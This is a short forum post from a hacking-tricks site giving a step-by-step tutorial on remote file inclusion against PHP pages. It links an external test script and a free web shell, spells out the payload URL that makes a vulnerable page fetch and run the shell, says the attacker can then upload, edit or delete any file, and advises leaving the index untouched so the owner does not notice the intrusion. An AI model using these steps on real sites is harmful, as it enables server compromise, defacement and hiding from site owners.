hacking with R.F.I - Printable Version +- Tricks Duniya -ONLINE SHOPPING GUIDE, MOBILE TRICKS, ANDROID TRICKS, HACKING (http://tricksduniya.com) +-- Forum: RULEBRAKER ZONE (http://tricksduniya.com/forum-3.html) +--- Forum: Ethical Hacking (http://tricksduniya.com/forum-8.html) +--- Thread: hacking with R.F.I (/thread-217.html)

hacking with R.F.I - admin - 03-01-2015 FOR EDUCATIONAL PURPOSES ONLY! Firstly you will need our RFI test sheet http://pastebin.com/PJ5K8fKj Upload that to your server and save it as RFI.php. When you access that file via a web browser it will look like this Very fancy  But the idea of this page is to open a file in the same page kinda like an iframe.  If we browse to http://www.mysite.com/rfi.php?page=http://www.google.co.uk/ (Take note of the location of http://www.google.co.uk/) This page is going to run anything that is after rfi.php?page= in the url. With that in mind we now understand that a shell can be executed from the server. So now you must upload a shell to our server, if we don't already own a shell we can download a free shell here http://www.multiupload.com/REU9V5EQAF Ok now it is uploaded to our server we must now inject it into the RFI test sheet. Like this http://www.mysite.com/rfi.php?page=http://www.mysite.com/shell.txt? we include the last ? to tell the page to run the code and not to display the page/code. Now you will see that the site has executed the shells code as if it was part of the original page . Meaning we can now upload,edit,delete any file we please to.  Do not change the index of the site as the owner may catch you. Upload a hacked.html page .